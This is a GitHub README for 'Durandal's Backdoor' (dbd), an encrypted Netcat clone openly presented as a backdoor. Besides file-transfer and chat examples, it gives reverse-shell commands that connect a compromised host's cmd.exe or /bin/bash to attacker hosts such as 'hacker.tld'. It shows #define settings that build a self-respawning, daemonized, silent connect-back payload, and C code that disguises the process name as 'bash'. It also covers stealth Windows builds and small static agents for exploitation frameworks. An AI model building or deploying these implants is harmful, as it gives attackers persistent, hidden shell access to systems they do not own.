-
Notifications
You must be signed in to change notification settings - Fork 42
Durandal's Backdoor
License
gitdurandal/dbd
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
d8888b. d8888b. d8888b. 88 `8D 88 `8D 88 `8D 88 88 88oooY' 88 88 88 88 88~~~b. 88 88 88 .8D 88 8D 88 .8D Y8888D' Y8888P' Y8888D' #[Durandal's Backdoor](http://gitbrew.org/dbd) #Copyright (C) 2013 Kyle Barnthouse [<[email protected]>](mailto:[email protected]) #dbd is distributed under the GNU GPL #Mipsbe binary added by Darkerego [<https://github.com/darkerego>] [(mailto:[email protected])] ###SYNOPSIS dbd is a Netcat-clone, designed to be portable and offer strong encryption. It runs on Unix-like operating systems and on Microsoft Win32. dbd features AES-CBC-128 + HMAC-SHA1 encryption (by Christophe Devine), program execution (-e option), choosing source port, continuous reconnection with delay, and some other nice features. dbd supports TCP/IP communication only. Source code and binaries are distributed under the GNU General Public License. ###COMPILATION $ make usage: make unix - Linux, NetBSD, FreeBSD, OpenBSD make unix32 - Linux, NetBSD, FreeBSD, OpenBSD 32-bit make sunos - SunOS (Solaris) make win32 - native win32 console app (w/ Cygwin + MinGW) make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW) make win32bg CFLAGS=-DSTEALTH - stealthy no-console app make mingw - native win32 console app (w/ MinGW MSYS) make mingwbg - native win32 no-console app (w/ MinGW MSYS) make mingwbg CFLAGS=-DSTEALTH - stealthy no-console app (w/ MinGW MSYS) make cygwin - Cygwin console app make darwin - Darwin cross-compile options: make mingw-cross - win32 cross compile (i586-mingw32msvc-gcc) make mingwbg-cross - win32 no-console cross compile (i586-mingw32msvc-gcc) make mingwbg-cross CFLAGS=-DSTEALTH - stealthy win32 cross compile make unix CROSS_COMPILE=<path/to/toolchain-> - cross compile for any arch roll up a tarball (move your compiled stuff to binaries/ first: make dist - create tarball with source files, readme, and binaries/ To compile dbd under a Unix-like operating system you need gcc and relevant development tools. For Linux, FreeBSD, NetBSD, OpenBSD (and possibly others), type: $ make unix For SunOS/Solaris, type: $ make sunos To compile dbd under Microsoft Windows (NT/2K/XP/2K3) you need MinGW+MSYS, or Cygwin with full development support (Cygwin's MinGW gcc). To compile a native Win32 dbd console application under Cygwin, type: $ make win32 or, under MSYS: $ make mingw To compile a no-console ("WinMain") application under Cygwin, type: $ make win32bg or, under MSYS: $ make mingwbg To compile a Cygwin-specific console application, type: $make cygwin You may want to change the default behaviour of dbd. One of the most important thing is to change the default shared secret to your own pass phrase. Edit dbd.h and replace with your preferences. You may, for example, want to hardcode a host + port to connect to if dbd is started without options. Complete examples are provided in dbd.h. ###SAMPLE USES With a little imagination, dbd can be used for many things: Use dbd to securely transfer files between two networks: snafu$ dbd -l -p 12345 -k secret > output.file fubar$ cat input.file | dbd -k secret snafu 12345 or from win32: C:\somedir>type input.fil | dbd -k secret snafu 12345 Use dbd as a simple (but secure) chat: snafu$ dbd -P snafu -Hon fubar 1234 fubar$ dbd -Pfubar -Hon -l -p 1234 Use dbd as a pen-test backdoor: C:\hacked box>dbdbg.exe -r1800 -q -e cmd.exe hacker.tld 443 or under Unix-like OSes: root@owned# ./dbd -r1800 -Don -e /bin/bash hacker.tld 993 ###HARD CODING OPTIONS In addition to using command line options, you can hard code variables by using #defines in dbd.h. To do this, set the variables you wish to use as named constants and compile as normal. For example, if you wanted to hard code a dbd executable that connected back to "evil.nationalbankofuganda.com" on port 995, and executed "/bin/bash" you could run: root@owned# ./dbd -e /bin/bash evil.nationalbankofuganda.com 995 or using hard-coded #defines, you could edit dbd.h: ```c #define DOLISTEN 0 #define HOST "evil.nationalbankofuganda.com" #define PORT 995 #define EXECPROG "/bin/bash" ``` You can also set respawn and stealth options to help maintain your connection: ```c #define RESPAWN_ENABLED 1 #define RESPAWN_INTERVAL 900 #define QUIET 1 #define DAEMONIZE 1 ``` This will set the connection to daemonize ("melt" in malware terms), never send output to STDOUT, and attempt to respawn the connection every 15 minutes should it ever disconnect from the listener. ###ROMULAN CLOAKING TECHNOLOGY Now we're getting into the fun stuff. Once you are a mastar at hard-coding options into your backdoor, you can use what is quite possibly the most fun named constant at our disposal: CLOAK. To do this, simply set the value: ```c #define CLOAK 1 ``` NOTE: this currently only works on *nix compiles. Eventually I plan on adding Win32 process migration/hooking so those targets can feel some Romulan love as well. For *nix environments, this option scrubs argv[0] and replaces it with the string "bash\0". It also scrubs all other argv[]'s (it'd look silly if ps returned "bash -e /bin/bash someremotehost.com 443" now wouldn't it?) I hope it goes without saying that you CANNOT USE THIS OPTION UNLESS YOU ARE HARD CODING YOUR VARIABLES INTO DBD.H. Also, if you're testing this on your own system it's gonna be fun picking the right pid to kill. ;) Feel free to use this scrubber in anything you happen to be working on: ```c //grab our named constant int cloak = CLOAK; //Engage cloaking device if(cloak) { #ifdef WIN32 //stub #else //change argv[0] to say bash int scrub; strncpy((char *)argv[0], "\0", strlen((char *)argv[0]) + 1); strcpy((char *)argv[0], "bash\0"); for (scrub = 1; scrub < argc; scrub++) { strncpy((char *)argv[scrub], "\0", strlen((char *)argv[scrub]) + 1); } #endif } ``` ###WARNING Do not pass cached input (a file with commands or similar) to a listening "dbd -e" session. "dbd -e" is using pipes to pass data between the program being executed and dbd. Pipes are used (instead of plain pass-through duplicate file descriptors) because of encryption between the pipes and the socket. In order to prevent the writing end of one of the pipes from blocking the whole process, I turned it into a non-blocking descriptor. There is a chance that when passing too much input at a time through to the -e program, it will be truncated (cut off) since the pipe buffer (in the OS) can't hold all of the data. This problem can be solved by making dbd multi-threaded for instance, but I'll avoid this as long as possible for compatibility reasons. ##CROSS-COMPILING Since dbd was designed to interoperate with other tools/frameworks, make now allows win32 cross compiling on Linux systems that have the mingw32-gcc toolchain. These options are almost identical to their Windows-native counterpart with the addition of "-cross" after the chosen build. Example: $ make mingw-cross will do the same thing on a Linux system that $ make mingw would do on a win32 system with mingw/msys installed on it. Right now all cross-compile options are built with Kali Linux in mind, but should work on any *nix with a little love. If you have mingw32-gcc installed and make won't build, edit the WCC variable at the top of the Makefile and put the path to your mingw32-gcc binary. As of dbd-1.5 you can use any crossbuild toolchain to compile dbd by setting the toolchain prefix as CROSS_COMPILE. For example, building an arm version is as easy as: $ make unix CROSS_COMPILE=arm-linux-gnueabi- ##ADVANCED WIZARDRY If you wish to integrate dbd with an exploitation framework, you can write a module that generates a custom dbd.h with configuration options specific to your target. Anything not explicitly #defined in this file will still use the defaults so you don't have to write everything in the header. Example: have a file rm dbd.h and replace with: ```c #define DOLISTEN 0 #define HOST "evil.nationalbankofuganda.com" #define PORT 995 #define EXECPROG "/bin/bash" #define RESPAWN_ENABLED 1 #define RESPAWN_INTERVAL 900 #define QUIET 1 #define CLOAK 1 #define SHARED_SECRET "customcrypto" ``` then call make <target options> to build an auto connecting payload with cloaking and respawning that connects back to a listening dbd agent on evil.nationalbankofuganda.com running with the options: $ dbd -l -p 995 -k customcrypto Another advanced trick is to compile dbd using dietlibc or uClibc. to compile a dietlibc linux dbd agent, use: $ make unix CROSS_COMPILE="diet -Os " Pay attention to the space after the s in the string. This allows the Makefile to add gcc with the standard CFLAGS and LDFLAGS so your agent builds properly. The advantage of using dietlibc is that it produces a very tiny 100% static executable for the target environment (around 70K for a linux dbd agent before packing as opposed to the standard 700K+ with glibc and gcc -static). Using uClibc is even easier, since you just set the crossbuild prefix for your toolchain under CROSS_COMPILE. ##LICENSE dbd Copyright (C) 2013 Kyle Barnthouse [email protected] This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA See the COPYING file for more information. --- dbd's AES-CBC-128 + HMAC-SHA1 implementation is Copyright (C) Christophe Devine [email protected] and is distributed under the GNU General Public License (GPL). Some code (for doexec_win32.h) has been derived from doexec.c from the Win32 port of Netcat (C) Weld Pond and hobbit. Parts of doexec.c is Copyright (C) 1994 Nathaniel W. Mishkin (doexec.c code was originally derived from rlogind.exe). The original version of Netcat was written by hobbit [email protected]. The NT version was done by Weld Pond [email protected]. --- (C) Kyle Barnthouse [<[email protected]>](mailto:[email protected]) Security Consultant [gitbrew.org](https://gitbrew.org) [Hephaestus Security](http://hephaestussec.com)